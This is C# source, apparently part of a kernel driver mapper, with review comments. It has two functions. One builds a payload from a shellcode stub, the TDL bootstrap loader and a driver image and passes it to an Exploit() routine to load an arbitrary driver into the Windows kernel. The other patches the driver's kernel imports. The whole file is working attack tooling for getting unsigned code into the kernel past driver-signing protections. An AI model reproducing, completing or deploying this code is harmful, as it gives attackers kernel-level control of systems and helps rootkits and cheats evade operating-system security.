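/// <summary>
/// Maps the driver at <paramref name="driverPath"/> into the kernel through <c>Exploit</c>.
/// The payload handed to <c>Exploit</c> is laid out as:
///   [0x000, 0x30a)  bootstrap stub: <c>mov rcx, &amp;ExAllocatePoolWithTag</c> followed by
///                   <c>Shellcode.TDLBootstrapLoader_code_w10rs2</c>, zero-padded to 0x30a bytes
///   [0x30a, 0x730a) the driver image as mapped by <c>Natives.LoadLibrary</c>, with its kernel
///                   imports patched by <c>ImportResolver.ResolveKernelImports</c>
/// </summary>
/// <param name="driverPath">Path of the driver file to map (operator-supplied, treated as trusted).</param>
/// <remarks>
/// Failures are printed to the console rather than propagated; <c>Unload()</c> always runs.
/// NOTE(review): assumes Natives.LoadLibrary maps the file without resolving its imports or
/// running its entry point (a kernel driver would not load otherwise) — confirm in Natives.
/// NOTE(review): the image copy is still fixed at 0x7000 bytes (original TODO: take it from
/// the mapped PE header). The SizeOfImage check below turns a truncated copy into a reported
/// error instead of silently mapping a partial driver.
/// </remarks>
public static void MapDriver(String driverPath)
{
    const int BootstrapSize = 0x30a;   // bytes reserved for the stub ahead of the image
    const int ImageCopySize = 0x7000;  // bytes copied from the mapped driver (see remarks)
    const int PayloadSize = 0x8000;    // total size reported to Exploit()

    Unload();
    Load();
    try
    {
        var imageBase = Natives.LoadLibrary(driverPath);
        if (imageBase == IntPtr.Zero)
        {
            throw new InvalidOperationException("LoadLibrary failed for " + driverPath);
        }

        // NOTE(review): assumes FindKernelProcedure yields 0 when the export is missing — confirm.
        var exAllocatePoolWithTag = Natives.FindKernelProcedure("ExAllocatePoolWithTag");
        if (exAllocatePoolWithTag == 0)
        {
            throw new InvalidOperationException("ExAllocatePoolWithTag could not be resolved");
        }

        // Stub: REX.W B9 = `mov rcx, imm64`; the TDL loader expects the allocator in rcx.
        var shellcode = new List<Byte>(PayloadSize);
        shellcode.Add(0x48);
        shellcode.Add(0xb9);
        shellcode.AddRange(BitConverter.GetBytes(exAllocatePoolWithTag));
        shellcode.AddRange(Shellcode.TDLBootstrapLoader_code_w10rs2);

        // The old `while (Count != 0x30a) Add(0)` never terminated once the stub outgrew its slot.
        if (shellcode.Count > BootstrapSize)
        {
            throw new InvalidOperationException(
                "bootstrap stub is " + shellcode.Count + " bytes, exceeds slot of " + BootstrapSize);
        }
        shellcode.AddRange(new Byte[BootstrapSize - shellcode.Count]);

        var image = new Byte[ImageCopySize];
        Marshal.Copy(imageBase, image, 0, image.Length);

        // SizeOfImage sits at +0x38 of the PE32+ optional header (same layout ResolveKernelImports
        // relies on). Refuse to ship an image the fixed-size copy cannot hold in full.
        var ntHeaderOffset = BitConverter.ToInt32(image, 0x3c);
        var sizeOfImage = BitConverter.ToInt32(image, ntHeaderOffset + 0x18 + 0x38);
        if (sizeOfImage > image.Length)
        {
            throw new InvalidOperationException(
                "driver SizeOfImage 0x" + sizeOfImage.ToString("x") + " exceeds copy buffer of 0x" + image.Length.ToString("x"));
        }

        image = ImportResolver.ResolveKernelImports(image);
        shellcode.AddRange(image);

        // BootstrapSize + ImageCopySize = 0x730a, which fits inside PayloadSize.
        Exploit(shellcode.ToArray(), PayloadSize, BootstrapSize);
    }
    catch (Exception e)
    {
        Console.WriteLine(e.Message);
    }
    finally
    {
        Unload();
    }
}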
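/// <summary>
/// Patches the import address table of a mapped PE32+ driver image so that every named
/// import points at the address returned by <c>Natives.FindKernelProcedure</c>.
/// </summary>
/// <param name="Image">
/// The driver as laid out in memory: RVAs from the headers are used directly as offsets into
/// this array, so it must be the mapped (not the on-disk) image. Patched in place.
/// </param>
/// <returns>The same array, with each IAT slot overwritten by the resolved kernel address.</returns>
/// <exception cref="ArgumentNullException"><paramref name="Image"/> is null.</exception>
/// <exception cref="NotSupportedException">The image is not PE32+, or an import is by ordinal.</exception>
/// <exception cref="ArgumentOutOfRangeException">A header field or thunk points outside the buffer.</exception>
/// <remarks>
/// Changes from the earlier version: every IMAGE_IMPORT_DESCRIPTOR is walked (the old code
/// resolved only the first one, leaving imports from any further module unpatched), FirstThunk
/// is used as the lookup table when OriginalFirstThunk is absent, the PE32+ magic is checked
/// before the 64-bit header offsets are trusted, and names are decoded as ASCII.
/// </remarks>
public static Byte[] ResolveKernelImports(Byte[] Image)
{
    if (Image == null)
    {
        throw new ArgumentNullException("Image");
    }

    const int ImportDescriptorSize = 20;   // sizeof(IMAGE_IMPORT_DESCRIPTOR)
    const int ThunkSize = 8;               // sizeof(IMAGE_THUNK_DATA64)
    const ushort Pe32PlusMagic = 0x20b;

    var ntHeaderOffset = BitConverter.ToInt32(Image, 0x3c);
    var optionalHeaderOffset = ntHeaderOffset + 0x18;

    // The +0x6c / +0x78 offsets below are only valid for the 64-bit optional header.
    if (BitConverter.ToUInt16(Image, optionalHeaderOffset) != Pe32PlusMagic)
    {
        throw new NotSupportedException("only PE32+ (64-bit) images are supported");
    }

    var numberOfRvaAndSizes = BitConverter.ToInt32(Image, optionalHeaderOffset + 0x6c);
    if (numberOfRvaAndSizes <= 1)
    {
        return Image;   // no IMAGE_DIRECTORY_ENTRY_IMPORT slot in the directory table
    }

    var importDirectoryRva = BitConverter.ToInt32(Image, optionalHeaderOffset + 0x78);
    if (importDirectoryRva == 0)
    {
        return Image;   // nothing imported
    }

    // The descriptor array is terminated by an all-zero entry.
    for (var descriptor = importDirectoryRva; ; descriptor += ImportDescriptorSize)
    {
        var originalFirstThunk = BitConverter.ToInt32(Image, descriptor + 0);
        var nameRva = BitConverter.ToInt32(Image, descriptor + 12);
        var firstThunk = BitConverter.ToInt32(Image, descriptor + 16);
        if (nameRva == 0 && firstThunk == 0)
        {
            break;
        }

        // Prefer the import name table; some linkers omit it, in which case the IAT itself
        // still holds the IMAGE_IMPORT_BY_NAME pointers until we overwrite them below.
        var lookupTable = originalFirstThunk != 0 ? originalFirstThunk : firstThunk;

        for (var i = 0; ; i++)
        {
            var entry = BitConverter.ToInt64(Image, lookupTable + i * ThunkSize);
            if (entry == 0)
            {
                break;   // end of this module's import list
            }
            if (entry < 0)
            {
                // IMAGE_ORDINAL_FLAG64 set: there is no name to look up.
                throw new NotSupportedException("import by ordinal is not supported");
            }

            // IMAGE_IMPORT_BY_NAME: 2-byte hint, then a NUL-terminated ASCII name.
            var nameOffset = entry + 2;
            if (nameOffset > Image.Length)
            {
                throw new ArgumentOutOfRangeException("Image", "import name lies outside the image");
            }
            var nameEnd = Array.IndexOf(Image, (Byte)0, (int)nameOffset);
            if (nameEnd < 0)
            {
                nameEnd = Image.Length;
            }
            var name = Encoding.ASCII.GetString(Image, (int)nameOffset, nameEnd - (int)nameOffset);

            var resolved = BitConverter.GetBytes((UInt64)Natives.FindKernelProcedure(name));
            Array.Copy(resolved, 0, Image, firstThunk + i * ThunkSize, ThunkSize);
        }
    }

    return Image;
}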